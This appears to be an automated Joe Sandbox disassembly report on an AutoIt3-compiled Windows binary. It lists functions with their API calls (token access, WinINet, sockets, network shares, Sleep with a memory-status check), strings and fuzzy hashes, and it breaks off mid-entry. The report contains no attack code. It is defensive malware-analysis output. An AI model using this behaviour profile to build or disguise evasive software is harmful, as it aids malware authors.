Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 787298e3948191bdf0c07f4e6944df9d3666a93624b770118f393a22cf37c537
Instruction ID: 256318b75c5c889c29d0e252984ecd5232d50e5b16c6423275f1d4f7fdc5cc4b
Opcode Fuzzy Hash: 787298e3948191bdf0c07f4e6944df9d3666a93624b770118f393a22cf37c537
Instruction Fuzzy Hash: 99F0547A100104ABCF016F55DC85A8ABF29EF45361F048051FE089E227C739E811DBB4

Function 0101BD1C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00F912F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F9134D
Part of subcall function 00F912F3: SelectObject.GDI32(?,00000000), ref: 00F9135C
Part of subcall function 00F912F3: BeginPath.GDI32(?), ref: 00F91373
Part of subcall function 00F912F3: SelectObject.GDI32(?,00000000), ref: 00F9139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101BD40
LineTo.GDI32(00000000,?,?), ref: 0101BD4D
EndPath.GDI32(00000000), ref: 0101BD5D
StrokePath.GDI32(00000000), ref: 0101BD6B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 87bb95eeb93e6d79bec15da538d1a345ea71dbac2a9e44c658caecc18ff2f0cd
Instruction ID: d48cb67a2a02f36a411bca120791ece6657e8cc6f50b771e0d456c6816dbc9bc
Opcode Fuzzy Hash: 87bb95eeb93e6d79bec15da538d1a345ea71dbac2a9e44c658caecc18ff2f0cd
Instruction Fuzzy Hash: 2BF0E23100025ABBEB336F95AC09FCE3FA8AF06310F044040FA90210D5C77E0254CF96

Function 00F92218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F92231
SetTextColor.GDI32(?,000000FF), ref: 00F9223B
SetBkMode.GDI32(?,00000001), ref: 00F92250
GetStockObject.GDI32(00000005), ref: 00F92258
GetWindowDC.USER32(?,00000000), ref: 00FCBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00FCBE90
GetPixel.GDI32(00000000,?,00000000), ref: 00FCBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00FCBEC2
GetPixel.GDI32(00000000,?,?), ref: 00FCBEE2
ReleaseDC.USER32(?,00000000), ref: 00FCBEED

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 580736679ae5c544f9c576c6f842d9c9327dee166028c49f96bb2e43d8a5639b
Instruction ID: 08bfc4b904660104943d654bd821c98a75ef261fe71a2d5b0ae65a5a6d8dad7d
Opcode Fuzzy Hash: 580736679ae5c544f9c576c6f842d9c9327dee166028c49f96bb2e43d8a5639b
Instruction Fuzzy Hash: 3CE03031544146AAEF215FA4F80EBD83B11EB06332F10835AFAA9480D5C77A4984EB11

Function 00FE8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00FE871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00FE82E6), ref: 00FE8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FE82E6), ref: 00FE872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00FE82E6), ref: 00FE8736

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 42c09e1801b1492390f7e07d5d4b4a9f3aeca1a0392497c131d0b68d609f69e2
Instruction ID: 2392692eba3c779c155f447d6ee605ec172bda9c2ddb28eb0862ecccd242ca3b
Opcode Fuzzy Hash: 42c09e1801b1492390f7e07d5d4b4a9f3aeca1a0392497c131d0b68d609f69e2
Instruction Fuzzy Hash: 01E08636A112129FD7306FB15D0CB9A3BACEF507E1F158818F6C9CA044DA3D844AD750

Function 00FEB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00FEB4BE

Strings

AutoIt3GUI, xrefs: 00FEB436
Container, xrefs: 00FEB43B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 42e50a10fc1cc2b545db0c4f55a36221ef9429f9308b1c9607dad15617616ff5
Instruction ID: e996e2de4b2d194e059fc8993fc9482403025f3afe14a24e3ee87f08a18836ab
Opcode Fuzzy Hash: 42e50a10fc1cc2b545db0c4f55a36221ef9429f9308b1c9607dad15617616ff5
Instruction Fuzzy Hash: BC915871600701AFDB14DF69C884B6BBBE5FF48710F24856DE94ACB291DB70E841DB50

Function 00FFAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

__wcsnicmp.LIBCMT ref: 00FFB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FFB0F6

Strings

LPT, xrefs: 00FFB027

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: b3a7e4ca83c0039e075c689dbccdfd9ac02e433d7284cfe69bcc8402dc830e75
Instruction ID: 6aedb657acfb123f5f26f1ca23ce3b8bdb11f1b2800fa9c1e9aa06b96af6bf74
Opcode Fuzzy Hash: b3a7e4ca83c0039e075c689dbccdfd9ac02e433d7284cfe69bcc8402dc830e75
Instruction Fuzzy Hash: D561B472E00219AFCB14DF98C891EBEB7B5EF08310F15406DF916AB261DB74AE44EB50

Function 00FA2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FA2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00FA2981

Strings

@, xrefs: 00FA2975

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 86a9fe62b084a7095515bae5683ada38c400ab55b662000cbbcc7aa693c7e5b2
Instruction ID: 713b9f4d5ff80eba5dacb64a380d4a79850675aec531c7bdf8f30d52c449c515
Opcode Fuzzy Hash: 86a9fe62b084a7095515bae5683ada38c400ab55b662000cbbcc7aa693c7e5b2
Instruction Fuzzy Hash: 5A517A714187449BE720EF14DC86BAFBBE8FF85340F82484DF2D881095EB798929DB56

Function 00FF9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F94F0B: __fread_nolock.LIBCMT ref: 00F94F29

_wcscmp.LIBCMT ref: 00FF9824
_wcscmp.LIBCMT ref: 00FF9837

Strings

FILE, xrefs: 00FF9770

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 251443b0e5c769d1ed77c2169b0b6dc73713bed1ea59dd35c602bc8a3dcfdf0f
Instruction ID: 06bbd8b805389b47fb3f6cd2cb58ec2ce43416d973857bfcb32d5fc1f3e8859c
Opcode Fuzzy Hash: 251443b0e5c769d1ed77c2169b0b6dc73713bed1ea59dd35c602bc8a3dcfdf0f
Instruction Fuzzy Hash: 6941E671A0420EBADF219EA0CC85FEFB7BDDF85714F000479FA04A7190D6B5A905DB60

Function 0100258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010025D4

Strings

|, xrefs: 010025A5

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 461eddc15362ab904af3f09d78b84fd390298d161985006b7c41286ab7f3a2c0
Instruction ID: 82aee7e9c1ea57efbf62c96b98b3a678e45f18eb1cbd13573986bb9cbec64bd9
Opcode Fuzzy Hash: 461eddc15362ab904af3f09d78b84fd390298d161985006b7c41286ab7f3a2c0
Instruction Fuzzy Hash: 98313A71800219EBEF01EFA5CC89EEEBFB9FF08350F000059F955A6162EB355A56DB60

Function 01017A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 01017B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01017B76

Strings

', xrefs: 01017ACA

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0ebb90d35fa30b53688b2657704c7b29a0938cf03eacede551ece1904e3dfecb
Instruction ID: 4ddb6f8461a24eb1d27617fc6d663063a5e1e283237fbf835dd40df82bfb62b3
Opcode Fuzzy Hash: 0ebb90d35fa30b53688b2657704c7b29a0938cf03eacede551ece1904e3dfecb
Instruction Fuzzy Hash: 81413C75A0030A9FDB54CFA8C880BEABBF5FF08300F50016AEA45AB345D735AA41CF90

Function 01016A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 01016B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01016B53

Strings

static, xrefs: 01016AB3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8ea30b6ad66c5bee68a6e7169e456603023d292e6726e2e9d8c96e234fee94aa
Instruction ID: 749295d9ec1042e702542641f7110fddd38fbebf4e1169bdde4d53eb0d83b695
Opcode Fuzzy Hash: 8ea30b6ad66c5bee68a6e7169e456603023d292e6726e2e9d8c96e234fee94aa
Instruction Fuzzy Hash: 4C31B071100204AEEB119F69CC80BFB77F9FF48760F00851DF9E987194DA7AA881CB60

Function 00FF28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FF294C

Strings

0, xrefs: 00FF290A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9b6e578c1fee8ce327cc68026dc49da9b8bf10bd899f31695ea9b0bc538686ff
Instruction ID: b2da3c772a246f1f99cdb878fde20632579393e3a37d34c62f838833a506c6b1
Opcode Fuzzy Hash: 9b6e578c1fee8ce327cc68026dc49da9b8bf10bd899f31695ea9b0bc538686ff
Instruction Fuzzy Hash: 9531BF31A003099BEB74CE98CC85BFEBBB8EF45360F140059EA85A71B0DBB49944FB51

Function 010039E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 01003A66

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Strings

, $, xrefs: 01003AA6
AUTOITCALLVARIABLE%d, xrefs: 01003A58

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 8ecc9f0b38afc371b1dadc51c15d5b5a724709ce7145d0bc6d4a6a478dcc4658
Instruction ID: 0cabcdc8dd5183e5da871fda3278a505127cd5f58838f0fe5db39a8bfbf7fc6d
Opcode Fuzzy Hash: 8ecc9f0b38afc371b1dadc51c15d5b5a724709ce7145d0bc6d4a6a478dcc4658
Instruction Fuzzy Hash: F021A270A00219AFDF16FFA5CC82EAE77B9BF45700F004469F545AB182DB38E945DB61

Function 010166D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01016761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0101676C

Strings

Combobox, xrefs: 0101672E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 5edb954ddf1d31206538fafc1853154a992706d8f9fbe27418b1214d8d5453e6
Instruction ID: a0997ca84c7ab2480c78f3e0d282b989e9d60c4e4ada3f778312acee3d6044b9
Opcode Fuzzy Hash: 5edb954ddf1d31206538fafc1853154a992706d8f9fbe27418b1214d8d5453e6
Instruction Fuzzy Hash: 2C11E6713002096FEF22CF18CC80EBB37AAFB483A4F100129F99497295E67A9C5187A0

Function 01016C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00F91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F91D73
Part of subcall function 00F91D35: GetStockObject.GDI32(00000011), ref: 00F91D87
Part of subcall function 00F91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F91D91

GetWindowRect.USER32(00000000,?), ref: 01016C71
GetSysColor.USER32(00000012), ref: 01016C8B

Strings

static, xrefs: 01016C4E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: fb588c7e9f5d83b1146f31243fcc7804c9d873660d2f5b29c34efbf7cc978294
Instruction ID: 59b8c337cfadabf4a2d7cb8dc950a12059de7ce24620ed73076cc562f422cdf4
Opcode Fuzzy Hash: fb588c7e9f5d83b1146f31243fcc7804c9d873660d2f5b29c34efbf7cc978294
Instruction Fuzzy Hash: 3721177291020AAFDF14DFA8CC45AFA7BA8FB08314F004619F995D3244E67AE8519B60

Function 01016920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 010169A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010169B1

Strings

edit, xrefs: 01016986

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: dd8f2d57e9fd6ff9fdc4b7bd6b2029951823fcdbc0569efef3188570cbea91e0
Instruction ID: 9dfc3a764690080bd05295948ef37f55d929f9ea080fb2d91f6f520bdff539e8
Opcode Fuzzy Hash: dd8f2d57e9fd6ff9fdc4b7bd6b2029951823fcdbc0569efef3188570cbea91e0
Instruction Fuzzy Hash: 9F116A71100209ABEB518E78DC40AEB3AAEEB053B8F504718F9E5971D8C6BADC559B60

Function 00FF29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FF2A41

Strings

0, xrefs: 00FF2A18

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 452af4fee2f76457aa1a30f73af783aa452a03ddc7413d535e5c42efdc767df6
Instruction ID: 5b0ad130495e0d14e5af9c5ab91db6d27fdf93f1212acdd33c888f803a6aed7f
Opcode Fuzzy Hash: 452af4fee2f76457aa1a30f73af783aa452a03ddc7413d535e5c42efdc767df6
Instruction Fuzzy Hash: D511E632D1121CABCF70DA98DC45BBA77B8AF46720F044021EA55E72A0D77CAD0AE791

Function 010021D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0100222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01002255

Strings

<local>, xrefs: 0100221D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: dd134ad5af5f7a655f37f96281c2f7f73353bffd5d710e57cfca3f88b8818062
Instruction ID: de849595f183878972ef2c8393f20cfb3c7cf021cb311f0b7d28e746fd352ea8
Opcode Fuzzy Hash: dd134ad5af5f7a655f37f96281c2f7f73353bffd5d710e57cfca3f88b8818062
Instruction Fuzzy Hash: 1811C270541625FAEB268F958C8CEFBFFACFF06655F00826AFA9586080D2705994C6F0

Function 01007D8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01007FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,01007DB3,?,00000000,?,?), ref: 0100800D

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01007DB6
htons.WSOCK32(00000000,?,00000000), ref: 01007DF3

Strings

255.255.255.255, xrefs: 01007DCE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
